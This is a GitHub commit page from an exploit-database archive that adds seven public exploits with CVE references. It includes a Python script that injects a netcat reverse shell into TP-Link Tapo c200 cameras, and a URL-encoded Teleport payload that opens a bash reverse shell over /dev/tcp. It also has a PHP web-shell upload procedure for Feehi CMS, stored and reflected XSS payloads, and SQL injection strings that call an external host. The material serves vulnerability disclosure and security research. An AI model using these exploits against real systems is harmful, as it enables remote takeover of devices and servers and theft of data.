Skip to content
This repository was archived by the owner on Nov 28, 2022. It is now read-only.

Commit c539714

Browse files
author
Offensive Security
committed
DB: 2022-09-24
7 changes to exploits/shellcodes Teleport v10.1.1 - Remote Code Execution (RCE) TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) Aero CMS v0.0.1 - SQLi Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
1 parent 3d2fa2f commit c539714

File tree

8 files changed

+284
-0
lines changed

8 files changed

+284
-0
lines changed

exploits/hardware/webapps/51017.py

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
2+
# Date: 02/11/2022
3+
# Exploit Author: hacefresko
4+
# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
5+
# Version: 1.1.15 and below
6+
# Tested on: 1.1.11, 1.1.14 and 1.1.15
7+
# CVE : CVE-2021-4045
8+
9+
# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce
10+
11+
import requests, urllib3, sys, threading, os
12+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
13+
14+
PORT = 1337
15+
REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
16+
NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)
17+
18+
if len(sys.argv) < 3:
19+
print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
20+
exit()
21+
22+
victim = sys.argv[1]
23+
attacker = sys.argv[2]
24+
25+
print("[+] Listening on %d" % PORT)
26+
t = threading.Thread(target=os.system, args=(NC_COMMAND,))
27+
t.start()
28+
29+
print("[+] Serving payload to %s\n" % victim)
30+
url = "https://" + victim + ":443/"
31+
json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
32+
requests.post(url, json=json, verify=False)

exploits/multiple/remote/51019.txt

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
2+
# Date: 08/01/2022
3+
# Exploit Author: Brandon Roach & Brian Landrum
4+
# Vendor Homepage: https://goteleport.com
5+
# Software Link: https://github.com/gravitational/teleport
6+
# Version: < 10.1.2
7+
# Tested on: Linux
8+
# CVE: CVE-2022-36633
9+
10+
Proof of Concept (payload):
11+
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
12+
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
13+
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
14+
method=3Diam
15+
16+
17+
Decoded payload:
18+
"
19+
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

exploits/php/webapps/51018.txt

Lines changed: 106 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,106 @@
1+
# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
2+
# Date: 22-08-2022
3+
# Exploit Author: yuyudhn
4+
# Vendor Homepage: https://feehi.com/
5+
# Software Link: https://github.com/liufee/cms
6+
# Version: 2.1.1 (REQUIRED)
7+
# Tested on: Linux, Docker
8+
# CVE : CVE-2022-34140
9+
10+
11+
12+
# Proof of Concept:
13+
1. Login using admin account at http://feehi-cms.local/admin
14+
2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex
15+
3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
16+
4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.
17+
5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php
18+
19+
# Burp request example:
20+
21+
POST /admin/index.php?r=ad%2Fcreate HTTP/1.1
22+
Host: feehi-cms.local
23+
Content-Length: 1530
24+
Cache-Control: max-age=0
25+
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
26+
sec-ch-ua-mobile: ?0
27+
sec-ch-ua-platform: "Linux"
28+
Upgrade-Insecure-Requests: 1
29+
Origin: http://feehi-cms.local
30+
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg
31+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
32+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
33+
Sec-Fetch-Site: same-origin
34+
Sec-Fetch-Mode: navigate
35+
Sec-Fetch-User: ?1
36+
Sec-Fetch-Dest: document
37+
Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
38+
Accept-Encoding: gzip, deflate
39+
Accept-Language: en-US,en;q=0.9
40+
Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D
41+
42+
Connection: close
43+
44+
45+
46+
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
47+
48+
Content-Disposition: form-data; name="_csrf_backend"
49+
50+
51+
52+
FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==
53+
54+
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
55+
56+
Content-Disposition: form-data; name="AdForm[name]"
57+
58+
59+
60+
rce
61+
62+
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
63+
64+
Content-Disposition: form-data; name="AdForm[tips]"
65+
66+
67+
68+
rce at Ad management
69+
70+
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
71+
72+
Content-Disposition: form-data; name="AdForm[input_type]"
73+
74+
75+
76+
1
77+
78+
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
79+
80+
Content-Disposition: form-data; name="AdForm[ad]"
81+
82+
83+
84+
85+
86+
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
87+
88+
Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"
89+
90+
Content-Type: image/png
91+
92+
93+
94+
<?php phpinfo();
95+
96+
97+
98+
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
99+
100+
Content-Disposition: form-data; name="AdForm[link]"
101+
102+
103+
104+
105+
106+
--------------

exploits/php/webapps/51020.txt

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
# Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
2+
# Google Dork: inurl:/wp-content/plugins/wp-useronline/
3+
# Date: 2022-08-24
4+
# Exploit Author: UnD3sc0n0c1d0
5+
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
6+
# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
7+
# Category: Web Application
8+
# Version: 2.88.0
9+
# Tested on: Debian / WordPress 6.0.1
10+
# CVE : CVE-2022-2941
11+
# Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c
12+
13+
# 1. Technical Description:
14+
The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions
15+
up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do
16+
not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers,
17+
with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user
18+
accesses the injected page.
19+
20+
# 2. Proof of Concept (PoC):
21+
a. Install and activate version 2.88.0 of the plugin.
22+
b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).
23+
c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use
24+
the following payload:
25+
<script>alert(/XSS/)</script>
26+
d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload
27+
will be executed.
28+
29+
Note: This change will be permanent until you modify the edited fields.

exploits/php/webapps/51021.txt

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
2+
# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/
3+
# Date: 2022-08-24
4+
# Exploit Author: UnD3sc0n0c1d0
5+
# Vendor Homepage: https://profiles.wordpress.org/3dady/
6+
# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip
7+
# Category: Web Application
8+
# Version: 1.0
9+
# Tested on: Debian / WordPress 6.0.1
10+
# CVE : N/A
11+
12+
# 1. Technical Description:
13+
The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text
14+
and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of
15+
JavaScript code that can exploit the vulnerability.
16+
17+
# 2. Proof of Concept (PoC):
18+
a. Install and activate version 1.0 of the plugin.
19+
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).
20+
c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):
21+
" autofocus onfocus=alert(/XSS/)>
22+
d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.
23+
24+
Note: This change will be permanent until you modify the edited fields.

exploits/php/webapps/51022.txt

Lines changed: 47 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,47 @@
1+
# Title: Aero CMS v0.0.1 - SQLi
2+
# Author: nu11secur1ty
3+
# Date: 08.27.2022
4+
# Vendor: https://github.com/MegaTKC
5+
# Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
6+
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
7+
8+
# Description:
9+
The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to
10+
be vulnerable to SQL injection attacks.
11+
The malicious user can dump-steal the database, from this CMS system
12+
and he can use it for very malicious purposes.
13+
14+
STATUS: HIGH Vulnerability
15+
16+
[+]Payload:
17+
```mysql
18+
---
19+
Parameter: author (GET)
20+
Type: boolean-based blind
21+
Title: OR boolean-based blind - WHERE or HAVING clause
22+
Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4
23+
24+
Type: error-based
25+
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
26+
GROUP BY clause (FLOOR)
27+
Payload: author=admin'+(select
28+
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
29+
OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT
30+
(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM
31+
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4
32+
33+
Type: time-based blind
34+
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
35+
Payload: author=admin'+(select
36+
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
37+
AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4
38+
39+
Type: UNION query
40+
Title: MySQL UNION query (NULL) - 10 columns
41+
Payload: author=admin'+(select
42+
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
43+
UNION ALL SELECT
44+
NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
45+
---
46+
47+
```

exploits/php/webapps/51023.txt

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
2+
# Date: 28/08/2022
3+
# Exploit Author: Ashkan Moghaddas
4+
# Vendor Homepage: https://testa.cc
5+
# Software Link:
6+
https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
7+
# Version: 3.5.1
8+
# Tested on: Windows/Linux
9+
10+
# Proof of Concept:
11+
# 1- Install Testa 3.5.1
12+
# 2- Go to https://localhost.com/login.php?redirect=XXXX
13+
# 3- Add payload to the Tab, the XSS Payload:
14+
%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
15+
# 4- XSS has been triggered.
16+
17+
# Go to this url "
18+
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
19+
"
20+
XSS will trigger.

files_exploits.csv

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -18727,6 +18727,7 @@ id,file,description,date,author,type,platform,port
1872718727
51011,exploits/linux/remote/51011.py,"Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",remote,linux,
1872818728
51015,exploits/ios/remote/51015.txt,"Wifi HD Wireless Disk Drive 11 - Local File Inclusion",1970-01-01,"Chokri Hammedi",remote,ios,
1872918729
51016,exploits/windows/remote/51016.sh,"WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",remote,windows,
18730+
51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",1970-01-01,"Brandon Roach",remote,multiple,
1873018731
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
1873118732
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
1873218733
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45078,3 +45079,9 @@ id,file,description,date,author,type,platform,port
4507845079
51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",1970-01-01,samguy,webapps,multiple,
4507945080
51012,exploits/hardware/webapps/51012.txt,"Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass",1970-01-01,"Jordan Glover",webapps,hardware,
4508045081
51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",1970-01-01,"Akshay Ravi",webapps,multiple,
45082+
51017,exploits/hardware/webapps/51017.py,"TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)",1970-01-01,hacefresko,webapps,hardware,
45083+
51018,exploits/php/webapps/51018.txt,"Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,yuyudhn,webapps,php,
45084+
51020,exploits/php/webapps/51020.txt,"Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
45085+
51021,exploits/php/webapps/51021.txt,"Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
45086+
51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
45087+
51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php,

0 commit comments

Comments
 (0)